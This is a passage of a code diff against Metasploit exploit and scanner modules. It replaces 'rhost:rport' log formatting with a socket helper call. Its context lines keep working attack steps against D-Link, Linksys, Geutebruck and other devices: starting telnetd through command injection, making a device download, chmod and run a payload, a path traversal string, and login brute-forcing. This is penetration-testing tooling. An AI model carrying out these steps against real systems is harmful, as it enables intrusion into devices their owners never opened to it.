     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error
       # Ignore common networking and response timeout errors

--- a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
+++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
         Net::SSH.start(ip, user, opts)
       end
       if ssh
-        print_good("#{ip}:#{rport} - Login Successful ('#{user}:#{pass})'")
+        print_good("#{ip}:#{rport} - Login Successful (#{user}:#{pass})")
       else
         print_error "#{ip}:#{rport} - Unknown error"
       end

--- a/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
+++ b/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
         print_good("File saved in: #{p}")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection Failed...")
       return false
     ensure
       disconnect

--- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
+++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
     this_host = nil
 
     if full_match
-      print_good("#{rhost}:#{rport} - Identified #{full_match[1]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Identified #{full_match[1]}")
       report_service(host: this_host || ip, port: rport, proto: 'tcp', name: 'https', info: full_match[1])
     end
 

--- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb
+++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb
@@ -40,21 +40,21 @@ class MetasploitModule < Msf::Auxiliary
     banner = sock.get_once(-1, 10)
 
     if !banner
-      print_error "#{rhost}:#{rport} No banner received from vmauthd"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} No banner received from vmauthd"
       return
     end
 
     banner = banner.strip
 
     unless banner =~ /VMware Authentication Daemon/
-      print_error "#{rhost}:#{rport} This does not appear to be a vmauthd service"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} This does not appear to be a vmauthd service"
       return
     end
 
     cert = nil
 
     if banner =~ /SSL/
-      print_status("#{rhost}:#{rport} Switching to SSL connection...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Switching to SSL connection...")
       swap_sock_plain_to_ssl
       cert = sock.peer_cert
     end
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
       banner << " Certificate:#{cert.subject}"
     end
 
-    print_good "#{rhost}:#{rport} Banner: #{banner}"
+    print_good "#{Rex::Socket.to_authority(rhost, rport)} Banner: #{banner}"
 
     report_service(
       host: rhost,

--- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb
@@ -72,11 +72,11 @@ class MetasploitModule < Msf::Auxiliary
       result = vim_do_login(user, pass)
       case result
       when :success
-        print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"
+        print_good "#{Rex::Socket.to_authority(rhost, rport)} - Successful Login! (#{user}:#{pass})"
         report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)
         return if datastore['STOP_ON_SUCCESS']
       when :fail
-        print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"
+        print_error "#{Rex::Socket.to_authority(rhost, rport)} - Login Failure (#{user}:#{pass})"
       end
     end
   end
@@ -100,22 +100,22 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     unless res
-      vprint_error("#{rhost}:#{rport} Error: no response")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Error: no response")
       return false
     end
 
     fingerprint_vmware(res)
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} Error: could not connect")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Error: could not connect")
     return false
   rescue StandardError => e
-    vprint_error("#{rhost}:#{rport} Error: #{e}")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Error: #{e}")
     return false
   end
 
   def fingerprint_vmware(res)
     unless res
-      vprint_error("#{rhost}:#{rport} Error: no response")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Error: no response")
       return false
     end
     return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')
@@ -126,12 +126,12 @@ class MetasploitModule < Msf::Auxiliary
     full_match = res.body.match(%r{<fullName>([\w\s.-]+)</fullName>})
 
     if full_match
-      print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} - Identified #{full_match[1]}"
       report_service(host: rhost, port: rport, proto: 'tcp', sname: 'https', info: full_match[1])
     end
 
     unless os_match && ver_match && build_match
-      vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMware")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Error: Could not identify host as VMware")
       return false
     end
 

--- a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Auxiliary
     traversal = '.\\..\\..\\..\\..\\..\\..\\..\\'
     uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
 
-    print_status("#{rhost}:#{rport} - Requesting: #{uri}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Requesting: #{uri}")
 
     res = send_request_raw({
       'method' => 'GET',
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if res.code == 404
-      print_error("#{rhost}:#{rport} - File not found")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - File not found")
       return
     end
 

--- a/modules/auxiliary/voip/asterisk_login.rb
+++ b/modules/auxiliary/voip/asterisk_login.rb
@@ -116,12 +116,12 @@ class MetasploitModule < Msf::Auxiliary
       return :abort
     end
 
-    vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying user:'#{user}' with password:'#{pass}'")
     cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"
     send_manager(cmd)
 
     if /Response: Success/.match(@result)
-      print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
+      print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{Rex::Socket.to_authority(rhost, rport)}!")
       report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
       disconnect
       return :next_user

--- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
+++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
@@ -98,15 +98,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 
@@ -122,11 +122,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     target['accounts'].each do |info|
       user, pass = info
-      print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login as '#{user}' with password '#{pass}'")
       conn = do_login(user, pass)
       next unless conn
 
-      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful ('#{user}:#{pass})")
       handler(conn.lsock)
       break
     end

--- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
+++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
       conn = do_login(user, pass)
       next unless conn
 
-      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful ('#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
       handler(conn.lsock)
       break
     end

--- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
@@ -80,15 +80,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     telnetport = rand(32767) + 32768
 
-    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Telnet port used: #{telnetport}")
 
     cmd = "telnetd -p #{telnetport}"
 
     # starting the telnetd gives no response
-    print_status("#{rhost}:#{rport} - Sending exploit request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending exploit request...")
     request(cmd)
 
-    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to establish a telnet connection...")
     ctx = { 'Msf' => framework, 'MsfExploit' => self }
     sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
 
@@ -98,16 +98,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     add_socket(sock)
 
-    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to establish a telnet session...")
     prompt = negotiate_telnet(sock)
     if prompt.nil?
       sock.close
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
     else
-      print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Telnet session successfully established... trying to connect")
     end
 
-    print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to create the Msf session...")
     begin
       Timeout.timeout(session_timeout) do
         activated = handler(sock)

--- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return nil
   end
 
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       end
-      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       return
     end
 
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}" + resource_uri
 
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the D-Link device to download #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
@@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # chmod
     #
     cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the D-Link device to chmod #{downfile}")
     res = request(cmd, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # execute
     #
     cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the D-Link device to execute #{downfile}")
     res = request(cmd, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -187,17 +187,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the target to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)

--- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
+++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def test_login(user, pass)
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
 
     login_path = "/login.php"
 
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       if (res.body) =~ /#{login_check}/
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -133,14 +133,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit_telnet
     telnetport = rand(32767) + 32768
 
-    print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Telnetport: #{telnetport}")
 
     cmd = "telnetd -p #{telnetport}"
 
     # starting the telnetd gives no response
     request(cmd)
 
-    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to establish a telnet connection...")
     ctx = { 'Msf' => framework, 'MsfExploit' => self }
     sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
 
@@ -150,13 +150,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     add_socket(sock)
 
-    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to establish a telnet session...")
     prompt = negotiate_telnet(sock)
     if prompt.nil?
       sock.close
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
     else
-      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Telnet session successfully established...")
     end
 
     handler(sock)

--- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb
+++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return nil
   end
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # testing Login
     #
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
         'uri' => '/login.htm',
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
       if res.body =~ %r{<script\ langauge="javascript">showMainTabs\("setup"\);</script>}
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       end
       return
     end
@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
       service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the D-Link device to download #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -189,33 +189,33 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
     end
     register_file_for_cleanup("/tmp/#{filename}")
 
-    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
 
     #
     # chmod
     #
     cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the D-Link device to chmod #{downfile}")
     res = request(cmd)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
-    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
 
     #
     # execute
     #
     cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the D-Link device to execute #{downfile}")
     res = request(cmd)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -226,17 +226,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
     end
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return
   end
 
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rhost = datastore['RHOST']
     rport = datastore['RPORT']
 
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
       'method' => 'POST',
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
     end
 
-    print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
 
     delstart = 'var cookieValue = "'
     tokenoffset = res.body.index(delstart) + delstart.size

--- a/modules/exploits/linux/http/dlink_hnap_login_bof.rb
+++ b/modules/exploits/linux/http/dlink_hnap_login_bof.rb
@@ -263,7 +263,7 @@ class MetasploitModule < Msf::Exploit::Remote
       resource_uri = '/' + downfile
 
       service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/linux/http/dreambox_openpli_shell.rb
+++ b/modules/exploits/linux/http/dreambox_openpli_shell.rb
@@ -58,8 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Sending remote command...")
-    vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending remote command...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
     begin
       send_request_cgi(
         {

--- a/modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
+++ b/modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
@@ -173,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Setting up request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Setting up request...")
 
     method = target['http_method']
     if method == 'GET'
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    print_status("Sending CMD injection request to #{rhost}:#{rport}")
+    print_status("Sending CMD injection request to #{Rex::Socket.to_authority(rhost, rport)}")
     send_request_cgi(
       {
         'method' => method,

--- a/modules/exploits/linux/http/geutebruck_instantrec_bof.rb
+++ b/modules/exploits/linux/http/geutebruck_instantrec_bof.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to exploit...")
     pad_size = 536
     data = Rex::Text.pattern_create(pad_size) + write_payload
     send_request_cgi(

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to exploit...")
     send_request_cgi(
       {
         'method' => 'GET',

--- a/modules/exploits/linux/http/hp_system_management.rb
+++ b/modules/exploits/linux/http/hp_system_management.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ret = [target['Ret']].pack('V')
     iprange = "a-bz" + padding + ret + payload.encoded
 
-    print_status("#{rhost}:#{rport} - Sending exploit...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending exploit...")
 
     res = send_request_cgi({
       'method' => 'GET',

--- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
+++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => '/'
       )
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Could not connect to device")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Could not connect to device")
       return Exploit::CheckCode::Unknown('Could not determine the target status')
     end
 
@@ -513,7 +513,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # telnet; access telnet and gain root shell through command injection.
   #
   def exploit
-    print_status "Validating router's HTTP server (#{rhost}:#{rport}) signature"
+    print_status "Validating router's HTTP server (#{Rex::Socket.to_authority(rhost, rport)}) signature"
     unless check == Exploit::CheckCode::Appears
       fail_with(Failure::Unknown, 'Unable to validate device fingerprint. Is it an HG532n?')
     end

--- a/modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    print_status("Checking the product version for #{url_schema}://#{rhost}:#{rport}")
+    print_status("Checking the product version for #{url_schema}://#{Rex::Socket.to_authority(rhost, rport)}")
 
     # This has been fixed in version 22.7R2.6, which corresponds to 22.7.2 (build 3981)
     # see https://help.ivanti.com/ps/help/en_US/ICS/22.x/22.7R2/22.xICSRN.pdf
@@ -362,7 +362,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     vprint_status("shell_cmd: #{@shell_cmd}")
 
-    print_status("Targeting #{url_schema}://#{rhost}:#{rport}")
+    print_status("Targeting #{url_schema}://#{Rex::Socket.to_authority(rhost, rport)}")
 
     @target = target_data[product_version.to_s]
     fail_with(Failure::BadConfig, "No target for this version (#{product_version})") unless @target

--- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return nil
   end
 
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # testing Login
     #
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
         'uri' => uri,
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
       if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
